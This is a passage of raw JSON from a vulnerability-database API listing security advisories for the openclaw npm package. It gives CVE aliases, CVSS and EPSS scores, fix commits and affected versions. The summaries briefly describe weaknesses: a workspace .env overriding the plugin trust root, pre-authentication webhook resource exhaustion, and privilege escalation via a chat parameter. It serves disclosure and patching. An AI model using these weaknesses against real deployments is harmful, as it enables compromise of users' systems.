system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:02Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5h2w-qmfp-ggp6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41344","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41344"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-verbose-parameter","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:02Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-verbose-parameter"},{"reference_url":"https://github.com/advisories/GHSA-5h2w-qmfp-ggp6","reference_id":"GHSA-5h2w-qmfp-ggp6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5h2w-qmfp-ggp6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41344","GHSA-5h2w-qmfp-ggp6"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5atj-2a7b-57g5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89678?format=json","vulnerability_id":"VCID-5rgx-2krs-guck","summary":"OpenClaw: Workspace `.env` can override the bundled plugin trust root\n## Summary\nWorkspace `.env` can override the bundled plugin trust root\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_PLUGINS_DIR, but critical is too high because exploitation still depends on attacker-controlled workspace loading, not a universal remote break.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `330a9f98cb29c79b1c16a2117e03d6276a0d6289` — 2026-03-31T19:25:12+09:00\n\nOpenClaw thanks @nexrin for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41396","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02663","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02716","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02711","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41396"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:16:36Z/"}],"url":"https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qcj9-wwgw-6gm8","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:16:36Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qcj9-wwgw-6gm8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41396","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41396"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-override-of-plugin-trust-root","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:16:36Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-override-of-plugin-trust-root"},{"reference_url":"https://github.com/advisories/GHSA-qcj9-wwgw-6gm8","reference_id":"GHSA-qcj9-wwgw-6gm8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qcj9-wwgw-6gm8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41396","GHSA-qcj9-wwgw-6gm8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5rgx-2krs-guck"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90967?format=json","vulnerability_id":"VCID-5s6h-u8x6-myfk","summary":"OpenClaw is vulnerable to unauthenticated resource exhaustion through its voice call webhook handling\n## Summary\nVoice Call webhook handling buffered request bodies before provider signature checks, enabling bounded unauthenticated resource exhaustion.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `651dc7450b68a5396a009db78ef9382633707ead`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/voice-call/src/webhook.ts now enforces header gating and shared pre-auth body caps before reading attacker-controlled request bodies.\n- extensions/voice-call/src/webhook.test.ts ships regression coverage for missing-signature, oversize, and timeout pre-auth webhook cases.\n\nOpenClaw thanks @SEORY0 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35626","reference_id":"","reference_type":"","scores":[{"value":"0.00124","scoring_system":"epss","scoring_elements":"0.3119","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00124","scoring_system":"epss","scoring_elements":"0.31121","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00124","scoring_system":"epss","scoring_elements":"0.31157","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35626"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/"}],"url":"https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35626","reference_id":"","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35626"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook"},{"reference_url":"https://github.com/advisories/GHSA-rm59-992w-x2mv","reference_id":"GHS